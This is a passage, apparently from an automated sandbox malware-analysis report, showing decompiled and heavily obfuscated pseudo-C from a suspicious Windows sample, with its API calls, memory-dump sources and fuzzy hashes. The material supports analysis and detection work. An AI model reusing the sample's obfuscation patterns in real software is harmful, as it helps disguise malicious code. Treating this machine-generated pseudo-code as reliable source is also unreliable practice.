                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						_t487 =  *0xf8d5ec; // 0xf8d5f0
                                                                                                                                                                                                                                                    						_t176 = _t487 + 0x94; // 0x1482000
                                                                                                                                                                                                                                                    						 *((intOrPtr*)( *((intOrPtr*)(_t520 + 0x64)) + 0x64)) =  *_t176;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_t482 =  *0xf8d5ec; // 0xf8d5f0
                                                                                                                                                                                                                                                    					_t187 = _t482 + 0xec; // 0xe608d
                                                                                                                                                                                                                                                    					if( *((intOrPtr*)( *((intOrPtr*)(_t520 + 0x64)) + 0x9c)) <=  *_t187) {
                                                                                                                                                                                                                                                    						_t398 = ( *( *((intOrPtr*)(_t520 + 0x64)) + 0xac) +  *((intOrPtr*)( *((intOrPtr*)(_t520 + 0x64)) + 0xbadbdd))) *  *0xf8d67c;
                                                                                                                                                                                                                                                    						__eflags = _t398;
                                                                                                                                                                                                                                                    						 *0xf8d67c = _t398;
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						_t486 =  *0xf8d6d8; // 0xf8d5f0
                                                                                                                                                                                                                                                    						_t309 = DdeInitializeA(_t486,  *((intOrPtr*)( *((intOrPtr*)(_t520 + 0x64)) + 0x90)) +  *0xf8d6e0,  *( *((intOrPtr*)(_t520 + 0x64)) + 0xf8));
                                                                                                                                                                                                                                                    						_t402 =  *0xf8d5ec; // 0xf8d5f0
                                                                                                                                                                                                                                                    						 *(_t402 + 0xc0) = _t309;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				ExitProcess( *( *((intOrPtr*)(_t520 + 0x64)) + 0xc0));
                                                                                                                                                                                                                                                    			}






























                                                                                                                                                                                                                                                    0x00ef1f81
                                                                                                                                                                                                                                                    0x00ef1f85
                                                                                                                                                                                                                                                    0x00ef1f8b
                                                                                                                                                                                                                                                    0x00ef1f98
                                                                                                                                                                                                                                                    0x00ef1f9e
                                                                                                                                                                                                                                                    0x00ef1fa5
                                                                                                                                                                                                                                                    0x00ef1fac
                                                                                                                                                                                                                                                    0x00ef1fb3
                                                                                                                                                                                                                                                    0x00ef1fba
                                                                                                                                                                                                                                                    0x00ef1fc1
                                                                                                                                                                                                                                                    0x00ef1fd4
                                                                                                                                                                                                                                                    0x00ef1fe5
                                                                                                                                                                                                                                                    0x00ef2134
                                                                                                                                                                                                                                                    0x00ef2137
                                                                                                                                                                                                                                                    0x00ef2159
                                                                                                                                                                                                                                                    0x00ef215f
                                                                                                                                                                                                                                                    0x00ef2172
                                                                                                                                                                                                                                                    0x00ef2179
                                                                                                                                                                                                                                                    0x00ef218b
                                                                                                                                                                                                                                                    0x00ef219b
                                                                                                                                                                                                                                                    0x00ef21af
                                                                                                                                                                                                                                                    0x00ef21bc
                                                                                                                                                                                                                                                    0x00ef21bf
                                                                                                                                                                                                                                                    0x00ef21c5
                                                                                                                                                                                                                                                    0x00ef21dc
                                                                                                                                                                                                                                                    0x00ef21dc
                                                                                                                                                                                                                                                    0x00ef21e0
                                                                                                                                                                                                                                                    0x00ef21f7
                                                                                                                                                                                                                                                    0x00ef21fc
                                                                                                                                                                                                                                                    0x00ef21ff
                                                                                                                                                                                                                                                    0x00ef21ff
                                                                                                                                                                                                                                                    0x00ef215f
                                                                                                                                                                                                                                                    0x00ef1feb
                                                                                                                                                                                                                                                    0x00ef1ff1
                                                                                                                                                                                                                                                    0x00ef1ffd
                                                                                                                                                                                                                                                    0x00ef2008
                                                                                                                                                                                                                                                    0x00ef2014
                                                                                                                                                                                                                                                    0x00ef2020
                                                                                                                                                                                                                                                    0x00ef202b
                                                                                                                                                                                                                                                    0x00ef2034
                                                                                                                                                                                                                                                    0x00ef2040
                                                                                                                                                                                                                                                    0x00ef204b
                                                                                                                                                                                                                                                    0x00ef2051
                                                                                                                                                                                                                                                    0x00ef205d
                                                                                                                                                                                                                                                    0x00ef2063
                                                                                                                                                                                                                                                    0x00ef2067
                                                                                                                                                                                                                                                    0x00ef206b
                                                                                                                                                                                                                                                    0x00ef206f
                                                                                                                                                                                                                                                    0x00ef2073
                                                                                                                                                                                                                                                    0x00ef2077
                                                                                                                                                                                                                                                    0x00ef2080
                                                                                                                                                                                                                                                    0x00ef208b
                                                                                                                                                                                                                                                    0x00ef2097
                                                                                                                                                                                                                                                    0x00ef20a3
                                                                                                                                                                                                                                                    0x00ef20ae
                                                                                                                                                                                                                                                    0x00ef20ba
                                                                                                                                                                                                                                                    0x00ef20c3
                                                                                                                                                                                                                                                    0x00ef20c9
                                                                                                                                                                                                                                                    0x00ef20cf
                                                                                                                                                                                                                                                    0x00ef20d3
                                                                                                                                                                                                                                                    0x00ef20d7
                                                                                                                                                                                                                                                    0x00ef20db
                                                                                                                                                                                                                                                    0x00ef20df
                                                                                                                                                                                                                                                    0x00ef20e3
                                                                                                                                                                                                                                                    0x00ef20e4
                                                                                                                                                                                                                                                    0x00ef20e9
                                                                                                                                                                                                                                                    0x00ef20ec
                                                                                                                                                                                                                                                    0x00ef20f8
                                                                                                                                                                                                                                                    0x00ef20fb
                                                                                                                                                                                                                                                    0x00ef2101
                                                                                                                                                                                                                                                    0x00ef2106
                                                                                                                                                                                                                                                    0x00ef210c
                                                                                                                                                                                                                                                    0x00ef210c
                                                                                                                                                                                                                                                    0x00ef1fe5
                                                                                                                                                                                                                                                    0x00ef220d
                                                                                                                                                                                                                                                    0x00ef242b
                                                                                                                                                                                                                                                    0x00ef2437
                                                                                                                                                                                                                                                    0x00ef243e
                                                                                                                                                                                                                                                    0x00ef2444
                                                                                                                                                                                                                                                    0x00ef244a
                                                                                                                                                                                                                                                    0x00ef245e
                                                                                                                                                                                                                                                    0x00ef2487
                                                                                                                                                                                                                                                    0x00ef248a
                                                                                                                                                                                                                                                    0x00ef2490
                                                                                                                                                                                                                                                    0x00ef2497
                                                                                                                                                                                                                                                    0x00ef24ae
                                                                                                                                                                                                                                                    0x00ef24c3
                                                                                                                                                                                                                                                    0x00ef24c9
                                                                                                                                                                                                                                                    0x00ef24cf
                                                                                                                                                                                                                                                    0x00ef24d5
                                                                                                                                                                                                                                                    0x00ef24e3
                                                                                                                                                                                                                                                    0x00ef24fa
                                                                                                                                                                                                                                                    0x00ef2515
                                                                                                                                                                                                                                                    0x00ef2518
                                                                                                                                                                                                                                                    0x00ef2521
                                                                                                                                                                                                                                                    0x00ef252e
                                                                                                                                                                                                                                                    0x00ef2549
                                                                                                                                                                                                                                                    0x00ef2570
                                                                                                                                                                                                                                                    0x00ef2570
                                                                                                                                                                                                                                                    0x00ef2572
                                                                                                                                                                                                                                                    0x00ef2213
                                                                                                                                                                                                                                                    0x00ef2219
                                                                                                                                                                                                                                                    0x00ef221f
                                                                                                                                                                                                                                                    0x00ef2228
                                                                                                                                                                                                                                                    0x00ef2234
                                                                                                                                                                                                                                                    0x00ef223d
                                                                                                                                                                                                                                                    0x00ef2248
                                                                                                                                                                                                                                                    0x00ef224e
                                                                                                                                                                                                                                                    0x00ef225a
                                                                                                                                                                                                                                                    0x00ef2281
                                                                                                                                                                                                                                                    0x00ef228d
                                                                                                                                                                                                                                                    0x00ef2290
                                                                                                                                                                                                                                                    0x00ef229c
                                                                                                                                                                                                                                                    0x00ef22a1
                                                                                                                                                                                                                                                    0x00ef22a6
                                                                                                                                                                                                                                                    0x00ef22ac
                                                                                                                                                                                                                                                    0x00ef22b7
                                                                                                                                                                                                                                                    0x00ef22c0
                                                                                                                                                                                                                                                    0x00ef22c9
                                                                                                                                                                                                                                                    0x00ef22d4
                                                                                                                                                                                                                                                    0x00ef22e0
                                                                                                                                                                                                                                                    0x00ef22e9
                                                                                                                                                                                                                                                    0x00ef22f4
                                                                                                                                                                                                                                                    0x00ef2300
                                                                                                                                                                                                                                                    0x00ef230c
                                                                                                                                                                                                                                                    0x00ef2312
                                                                                                                                                                                                                                                    0x00ef2339
                                                                                                                                                                                                                                                    0x00ef2345
                                                                                                                                                                                                                                                    0x00ef2350
                                                                                                                                                                                                                                                    0x00ef2368
                                                                                                                                                                                                                                                    0x00ef2386
                                                                                                                                                                                                                                                    0x00ef238b
                                                                                                                                                                                                                                                    0x00ef2391
                                                                                                                                                                                                                                                    0x00ef23a3
                                                                                                                                                                                                                                                    0x00ef23a3
                                                                                                                                                                                                                                                    0x00ef23ac
                                                                                                                                                                                                                                                    0x00ef236a
                                                                                                                                                                                                                                                    0x00ef236d
                                                                                                                                                                                                                                                    0x00ef2373
                                                                                                                                                                                                                                                    0x00ef2379
                                                                                                                                                                                                                                                    0x00ef2379
                                                                                                                                                                                                                                                    0x00ef23b5
                                                                                                                                                                                                                                                    0x00ef23c1
                                                                                                                                                                                                                                                    0x00ef23c7
                                                                                                                                                                                                                                                    0x00ef2416
                                                                                                                                                                                                                                                    0x00ef2416
                                                                                                                                                                                                                                                    0x00ef241d
                                                                                                                                                                                                                                                    0x00ef23c9
                                                                                                                                                                                                                                                    0x00ef23e3
                                                                                                                                                                                                                                                    0x00ef23ea
                                                                                                                                                                                                                                                    0x00ef23f0
                                                                                                                                                                                                                                                    0x00ef23f6
                                                                                                                                                                                                                                                    0x00ef23f6
                                                                                                                                                                                                                                                    0x00ef2423
                                                                                                                                                                                                                                                    0x00ef257f

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?), ref: 00EF2179
                                                                                                                                                                                                                                                    • DdeInitializeA.USER32(00F8D5F0,?,?), ref: 00EF23EA
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00EF243E
                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00EF248A
                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?), ref: 00EF2549
                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00EF257F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.858247527.0000000000EF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EF0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858203754.0000000000EF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858744722.0000000000F09000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.860024941.0000000000F4C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861275270.0000000000F8D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861368682.0000000000F8F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ef0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: HandleProcess$ByteCharCloseCurrentExitInitializeModuleMultiWide
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2062908402-0
                                                                                                                                                                                                                                                    • Opcode ID: 7f8dfb67235c2d17f00d1d964e784fa6753466e83b74c2814704a4da3ab245ad
                                                                                                                                                                                                                                                    • Instruction ID: ac726aa7ce30ae5c4e54d810ae90b3ac35c27fd43923def44f76f0b66f9e08e1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f8dfb67235c2d17f00d1d964e784fa6753466e83b74c2814704a4da3ab245ad
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6D2295B5A00248DFDB08DF98D994AAD7BB6FF88304F14822AF9199B395D734E841CF54
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 247 ef3e70-ef3ee2 248 ef41eb-ef4216 247->248 249 ef3ee8-ef3ef3 247->249 252 ef4218-ef4230 248->252 253 ef4233-ef4242 248->253 250 ef40ec-ef411f 249->250 251 ef3ef9-ef3f7d call ef3450 249->251 254 ef41e9 250->254 255 ef4125-ef4133 250->255 260 ef3f7f-ef3fa5 251->260 261 ef3fa7-ef3fb9 251->261 252->253 254->253 257 ef413e-ef4148 255->257 257->254 259 ef414e-ef41e4 CreateFileMappingA 257->259 259->257 263 ef3fbf-ef4067 call f08570 call ef47e0 260->263 261->263 267 ef406c-ef40e7 call ef14c0 263->267 267->254
                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E00EF3E70() {
                                                                                                                                                                                                                                                    				intOrPtr _t189;
                                                                                                                                                                                                                                                    				intOrPtr _t211;
                                                                                                                                                                                                                                                    				signed int _t224;
                                                                                                                                                                                                                                                    				intOrPtr _t302;
                                                                                                                                                                                                                                                    				intOrPtr _t303;
                                                                                                                                                                                                                                                    				intOrPtr _t304;
                                                                                                                                                                                                                                                    				intOrPtr _t347;
                                                                                                                                                                                                                                                    				intOrPtr* _t348;
                                                                                                                                                                                                                                                    				void* _t350;
                                                                                                                                                                                                                                                    				void* _t359;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t348 = _t350 - 0x60;
                                                                                                                                                                                                                                                    				 *(_t348 + 0x50) =  *((intOrPtr*)(_t348 + 0x74)) + 0xef;
                                                                                                                                                                                                                                                    				 *(_t348 + 0x4c) =  *(_t348 + 0x68) + 0x33;
                                                                                                                                                                                                                                                    				 *(_t348 + 0x54) =  *(_t348 + 0x68) ^ 0x000002dc;
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t348 + 0x3c)) =  *((intOrPtr*)(_t348 + 0x6c)) + 0x221;
                                                                                                                                                                                                                                                    				 *(_t348 + 0x48) =  *(_t348 + 0x70) ^ 0x000026d4;
                                                                                                                                                                                                                                                    				 *(_t348 + 0x40) =  *(_t348 + 0x70) ^ 0x000026d4;
                                                                                                                                                                                                                                                    				 *(_t348 + 0x58) =  *((intOrPtr*)(_t348 + 0x6c)) - 0x92;
                                                                                                                                                                                                                                                    				 *(_t348 + 0x5c) =  *(_t348 + 0x70) - 0x26d4;
                                                                                                                                                                                                                                                    				if( *(_t348 + 0x50) <  *(_t348 + 0x5c) + 0x2622) {
                                                                                                                                                                                                                                                    					if( *((intOrPtr*)( *((intOrPtr*)(_t348 + 0x7c)) + 0xc4)) != ( *(_t348 + 0x54) *  *(_t348 + 0x54) |  *( *((intOrPtr*)(_t348 + 0x7c)) + 0xbadc81))) {
                                                                                                                                                                                                                                                    						 *(_t348 + 0x5c) =  *(_t348 + 0x5c) +  *0x00F8D6A8 - 0x26d4;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					if( *(_t348 + 0x40) >  *(_t348 + 0x58) + 0x2fb) {
                                                                                                                                                                                                                                                    						_t347 =  *0xf8d5ec; // 0xf8d5f0
                                                                                                                                                                                                                                                    						_t302 =  *0xf8d5ec; // 0xf8d5f0
                                                                                                                                                                                                                                                    						if( *((intOrPtr*)(_t302 + 0xbadc81)) > ( *( *((intOrPtr*)(_t348 + 0x7c)) + 0x78) |  *(_t347 + 0x14)) + 0x2598) {
                                                                                                                                                                                                                                                    							_t189 =  *0xf8d5ec; // 0xf8d5f0
                                                                                                                                                                                                                                                    							_t120 = _t189 + 0xe4; // 0xc
                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_t348 + 0x44)) =  *_t120;
                                                                                                                                                                                                                                                    							while( *((intOrPtr*)(_t348 + 0x44)) <=  *(_t348 + 0x5c) *  *(_t348 + 0x5c)) {
                                                                                                                                                                                                                                                    								_t303 =  *0xf8d5ec; // 0xf8d5f0
                                                                                                                                                                                                                                                    								 *(_t348 - 0x40) = ( *(_t348 + 0x54) &  *(_t303 + 0xbadca9)) *  *(_t348 + 0x58);
                                                                                                                                                                                                                                                    								_t304 =  *0xf8d5ec; // 0xf8d5f0
                                                                                                                                                                                                                                                    								 *(_t348 - 0x3c) =  *(_t348 + 0x40) -  *((intOrPtr*)(_t304 + 0xbadbed));
                                                                                                                                                                                                                                                    								 *(_t348 - 0x38) =  *( *((intOrPtr*)(_t348 + 0x7c)) + 0x3c) ^  *( *((intOrPtr*)(_t348 + 0x7c)) + 0xbadc51);
                                                                                                                                                                                                                                                    								 *(_t348 - 0x34) =  *(_t348 + 0x58) &  *( *((intOrPtr*)(_t348 + 0x7c)) + 0x8c);
                                                                                                                                                                                                                                                    								 *(_t348 - 0x30) =  *(_t348 + 0x48) *  *(_t348 + 0x48) |  *(_t348 + 0x50);
                                                                                                                                                                                                                                                    								 *(_t348 - 0x2c) =  *(_t348 + 0x4c) + 0x2598;
                                                                                                                                                                                                                                                    								CreateFileMappingA( *(_t348 - 0x40),  *(_t348 - 0x3c),  *(_t348 - 0x38),  *(_t348 - 0x34),  *(_t348 - 0x30),  *(_t348 - 0x2c));
                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_t348 + 0x44)) =  *((intOrPtr*)(_t348 + 0x44)) + 4;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t348 + 0x20)) =  *(_t348 + 0x5c) + 0x2633;
                                                                                                                                                                                                                                                    						 *(_t348 + 0x24) =  *(_t348 + 0x58) ^ 0x000001c1;
                                                                                                                                                                                                                                                    						 *(_t348 + 0x28) =  *(_t348 + 0x5c) ^ 0x00002598;
                                                                                                                                                                                                                                                    						 *(_t348 + 0x2c) =  *(_t348 + 0x54) ^ 0x0000013e;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t348 + 0x30)) =  *(_t348 + 0x5c) + 0x2801;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t348 + 0x34)) =  *(_t348 + 0x50) - 0xef;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t348 + 0x38)) =  *((intOrPtr*)(_t348 + 0x7c));
                                                                                                                                                                                                                                                    						 *(_t348 + 0x5c) = E00EF3450( *((intOrPtr*)(_t348 + 0x20)),  *(_t348 + 0x24),  *(_t348 + 0x28),  *(_t348 + 0x2c),  *((intOrPtr*)(_t348 + 0x30)),  *((intOrPtr*)(_t348 + 0x34)),  *((intOrPtr*)(_t348 + 0x38)));
                                                                                                                                                                                                                                                    						_t211 =  *0xf8d5ec; // 0xf8d5f0
                                                                                                                                                                                                                                                    						_t44 = _t211 + 0xac; // 0x1a0e74
                                                                                                                                                                                                                                                    						_t359 =  *_t44 -  *0xf8d68c; // 0x14b95e
                                                                                                                                                                                                                                                    						if(_t359 > 0) {
                                                                                                                                                                                                                                                    							 *((intOrPtr*)( *((intOrPtr*)(_t348 + 0x7c)) + 0x98)) =  *((intOrPtr*)( *((intOrPtr*)(_t348 + 0x7c)) + 0x98)) +  *((intOrPtr*)( *((intOrPtr*)(_t348 + 0x7c)) + 0x1c));
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    							 *0xf8d6cc =  *((intOrPtr*)( *((intOrPtr*)(_t348 + 0x7c)) + 0x10)) -  *((intOrPtr*)( *((intOrPtr*)(_t348 + 0x7c)) + 0xe4)) ^  *( *((intOrPtr*)(_t348 + 0x7c)) + 0xdc);
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t348 + 0xc)) =  *(_t348 + 0x4c) + 0x2a2;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t348 + 0x10)) =  *(_t348 + 0x50) - 0x54;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t348 + 0x14)) =  *((intOrPtr*)(_t348 + 0x3c)) + 0x48;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t348 + 0x18)) =  *((intOrPtr*)(_t348 + 0x7c));
                                                                                                                                                                                                                                                    						 *(_t348 + 0x1c) =  *(_t348 + 0x5c) ^ 0x00000111;
                                                                                                                                                                                                                                                    						 *(_t348 + 0x58) = E00F08570( *((intOrPtr*)(_t348 + 0xc)),  *((intOrPtr*)(_t348 + 0x10)),  *((intOrPtr*)(_t348 + 0x14)),  *((intOrPtr*)(_t348 + 0x18)),  *(_t348 + 0x1c));
                                                                                                                                                                                                                                                    						 *(_t348 - 0xc) =  *(_t348 + 0x4c) ^ 0x00000221;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t348 - 8)) = 0xf8d5f0;
                                                                                                                                                                                                                                                    						 *(_t348 - 4) =  *(_t348 + 0x48) ^ 0x00002565;
                                                                                                                                                                                                                                                    						 *_t348 =  *(_t348 + 0x58) - 0xdc;
                                                                                                                                                                                                                                                    						 *(_t348 + 4) =  *(_t348 + 0x50) ^ 0x000000b4;
                                                                                                                                                                                                                                                    						 *(_t348 + 8) =  *(_t348 + 0x54) ^ 0x00000221;
                                                                                                                                                                                                                                                    						_t224 = E00EF47E0( *(_t348 - 0xc),  *((intOrPtr*)(_t348 - 8)),  *(_t348 - 4),  *_t348,  *(_t348 + 4),  *(_t348 + 8)); // executed
                                                                                                                                                                                                                                                    						 *(_t348 + 0x54) = _t224;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t348 - 0x28)) =  *(_t348 + 0x58) + 0x71;
                                                                                                                                                                                                                                                    						 *(_t348 - 0x24) =  *(_t348 + 0x54) ^ 0x00000d9a;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t348 - 0x20)) =  *(_t348 + 0x58) - 0x41;
                                                                                                                                                                                                                                                    						 *(_t348 - 0x1c) =  *(_t348 + 0x5c);
                                                                                                                                                                                                                                                    						 *(_t348 - 0x18) =  *(_t348 + 0x48) ^ 0x0000253b;
                                                                                                                                                                                                                                                    						 *(_t348 - 0x14) =  *(_t348 + 0x50) ^ 0x00000240;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t348 - 0x10)) =  *((intOrPtr*)(_t348 + 0x7c));
                                                                                                                                                                                                                                                    						 *(_t348 + 0x54) = E00EF14C0( *((intOrPtr*)(_t348 - 0x28)),  *(_t348 - 0x24),  *((intOrPtr*)(_t348 - 0x20)),  *(_t348 - 0x1c),  *(_t348 - 0x18),  *(_t348 - 0x14),  *((intOrPtr*)(_t348 - 0x10)));
                                                                                                                                                                                                                                                    						 *(_t348 + 0x4c) =  *(_t348 + 0x4c) ^ 0x000003ba;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return  *((intOrPtr*)(_t348 + 0x3c)) + 0x81;
                                                                                                                                                                                                                                                    			}













                                                                                                                                                                                                                                                    0x00ef3e71
                                                                                                                                                                                                                                                    0x00ef3e84
                                                                                                                                                                                                                                                    0x00ef3e8d
                                                                                                                                                                                                                                                    0x00ef3e99
                                                                                                                                                                                                                                                    0x00ef3ea4
                                                                                                                                                                                                                                                    0x00ef3eb0
                                                                                                                                                                                                                                                    0x00ef3ebc
                                                                                                                                                                                                                                                    0x00ef3ec7
                                                                                                                                                                                                                                                    0x00ef3ed3
                                                                                                                                                                                                                                                    0x00ef3ee2
                                                                                                                                                                                                                                                    0x00ef4216
                                                                                                                                                                                                                                                    0x00ef4230
                                                                                                                                                                                                                                                    0x00ef4230
                                                                                                                                                                                                                                                    0x00ef3ee8
                                                                                                                                                                                                                                                    0x00ef3ef3
                                                                                                                                                                                                                                                    0x00ef40ff
                                                                                                                                                                                                                                                    0x00ef4112
                                                                                                                                                                                                                                                    0x00ef411f
                                                                                                                                                                                                                                                    0x00ef4125
                                                                                                                                                                                                                                                    0x00ef412a
                                                                                                                                                                                                                                                    0x00ef4130
                                                                                                                                                                                                                                                    0x00ef413e
                                                                                                                                                                                                                                                    0x00ef4156
                                                                                                                                                                                                                                                    0x00ef416a
                                                                                                                                                                                                                                                    0x00ef4174
                                                                                                                                                                                                                                                    0x00ef4181
                                                                                                                                                                                                                                                    0x00ef419c
                                                                                                                                                                                                                                                    0x00ef41ab
                                                                                                                                                                                                                                                    0x00ef41b8
                                                                                                                                                                                                                                                    0x00ef41c3
                                                                                                                                                                                                                                                    0x00ef41de
                                                                                                                                                                                                                                                    0x00ef413b
                                                                                                                                                                                                                                                    0x00ef413b
                                                                                                                                                                                                                                                    0x00ef413e
                                                                                                                                                                                                                                                    0x00ef3ef9
                                                                                                                                                                                                                                                    0x00ef3f02
                                                                                                                                                                                                                                                    0x00ef3f0e
                                                                                                                                                                                                                                                    0x00ef3f19
                                                                                                                                                                                                                                                    0x00ef3f25
                                                                                                                                                                                                                                                    0x00ef3f31
                                                                                                                                                                                                                                                    0x00ef3f3c
                                                                                                                                                                                                                                                    0x00ef3f42
                                                                                                                                                                                                                                                    0x00ef3f69
                                                                                                                                                                                                                                                    0x00ef3f6c
                                                                                                                                                                                                                                                    0x00ef3f71
                                                                                                                                                                                                                                                    0x00ef3f77
                                                                                                                                                                                                                                                    0x00ef3f7d
                                                                                                                                                                                                                                                    0x00ef3fb9
                                                                                                                                                                                                                                                    0x00ef3f7f
                                                                                                                                                                                                                                                    0x00ef3fa0
                                                                                                                                                                                                                                                    0x00ef3fa0
                                                                                                                                                                                                                                                    0x00ef3fc7
                                                                                                                                                                                                                                                    0x00ef3fd0
                                                                                                                                                                                                                                                    0x00ef3fd9
                                                                                                                                                                                                                                                    0x00ef3fdf
                                                                                                                                                                                                                                                    0x00ef3feb
                                                                                                                                                                                                                                                    0x00ef400a
                                                                                                                                                                                                                                                    0x00ef4016
                                                                                                                                                                                                                                                    0x00ef4019
                                                                                                                                                                                                                                                    0x00ef4029
                                                                                                                                                                                                                                                    0x00ef4034
                                                                                                                                                                                                                                                    0x00ef4040
                                                                                                                                                                                                                                                    0x00ef404c
                                                                                                                                                                                                                                                    0x00ef4067
                                                                                                                                                                                                                                                    0x00ef406f
                                                                                                                                                                                                                                                    0x00ef4078
                                                                                                                                                                                                                                                    0x00ef4084
                                                                                                                                                                                                                                                    0x00ef408d
                                                                                                                                                                                                                                                    0x00ef4093
                                                                                                                                                                                                                                                    0x00ef409f
                                                                                                                                                                                                                                                    0x00ef40ab
                                                                                                                                                                                                                                                    0x00ef40b1
                                                                                                                                                                                                                                                    0x00ef40d8
                                                                                                                                                                                                                                                    0x00ef40e4
                                                                                                                                                                                                                                                    0x00ef40e4
                                                                                                                                                                                                                                                    0x00ef41e9
                                                                                                                                                                                                                                                    0x00ef4242

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateFileMappingA.KERNEL32 ref: 00EF41DE
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.858247527.0000000000EF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EF0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858203754.0000000000EF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858744722.0000000000F09000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.860024941.0000000000F4C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861275270.0000000000F8D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861368682.0000000000F8F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ef0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateFileMapping
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 524692379-0
                                                                                                                                                                                                                                                    • Opcode ID: b0a62ecc73509ce9639c24e20c8620e403e4c95baa1676a9b1b3ef8a97eea42e
                                                                                                                                                                                                                                                    • Instruction ID: 37b969c29803b4aded3b7eaa00dcb381e4538dc2a06d6dfa12c4f0396e466391
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b0a62ecc73509ce9639c24e20c8620e403e4c95baa1676a9b1b3ef8a97eea42e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0AD1C3B1A00148DFDB18CF98D990AEEB7F5FF88304F54812AFA199B395D634E841CB94
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 314 efdedd-efdee8 SetUnhandledExceptionFilter
                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E00EFDEDD() {
                                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t1;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t1 = SetUnhandledExceptionFilter(E00EFDEE9); // executed
                                                                                                                                                                                                                                                    				return _t1;
                                                                                                                                                                                                                                                    			}




                                                                                                                                                                                                                                                    0x00efdee2
                                                                                                                                                                                                                                                    0x00efdee8

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0000DEE9,00EFDAE0), ref: 00EFDEE2
                                                                                                                                                                                                                                                    Memory Dump Source
